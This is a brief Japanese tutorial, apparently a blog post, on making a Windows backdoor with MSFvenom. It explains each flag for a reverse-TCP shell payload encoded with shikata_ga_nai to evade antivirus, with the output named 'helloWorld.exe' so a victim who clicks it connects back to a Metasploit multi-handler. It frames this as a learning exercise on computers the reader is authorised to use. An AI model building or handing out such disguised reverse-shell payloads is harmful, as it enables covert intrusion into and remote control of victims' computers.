バックドアは、セキュリティ・メカニズムを迂回するために使用される。msfpayloadとmsfencodeを組み合わせたMSFvenomを使用すると、リバースシェルTCPを使用して攻撃者に接続するバックドアを作成することができます。バックドアを開発するには、マルウェアのシグネチャを変更して、アンチウイルス・ソフトウェアを回避する必要があります。このプロジェクトは、あなたがアクセスする許可を得ている2台のコンピュータ上で完成させ、その過程で、コンピュータのセキュリティとこの種のバックドアがどのように機能するかについて、より深く学んでください。
- x86/shikata_ga_naiをエンコーダーとして使用します。
- -a x86 --platform windows 使用するアーキテクチャを指定します。
- -p windows/shell/reverse_tcp 組み込むペイロードを指定します。
- LHOSTはリスナーのIPアドレスを指定する。
- LPORT リスナーのポートを指定します。
- -b "ⅳx00 "は不正な文字(ヌルバイト)を避けるために指定します。
- -e x86/shikata_ga_nai エンコーダー名を指定します。
- -f exe > helloWorld.exe はフォーマット出力を指定します。
- これでバックドアが生成されました。被害者がhelloWorld.exeをクリックすると、埋め込まれたシェルペイロードが起動し、あなたのシステムに接続します。接続を受け取るためには、Metasploit でマルチハンドラを開き、ペイロードを設定する必要があります。
- 「LHOST」はリスナーIPアドレスを指定する。
- 「LPORT」はリスナー・ポートを指定する。
コメント
最新を表示する
NG表示方式
NGID一覧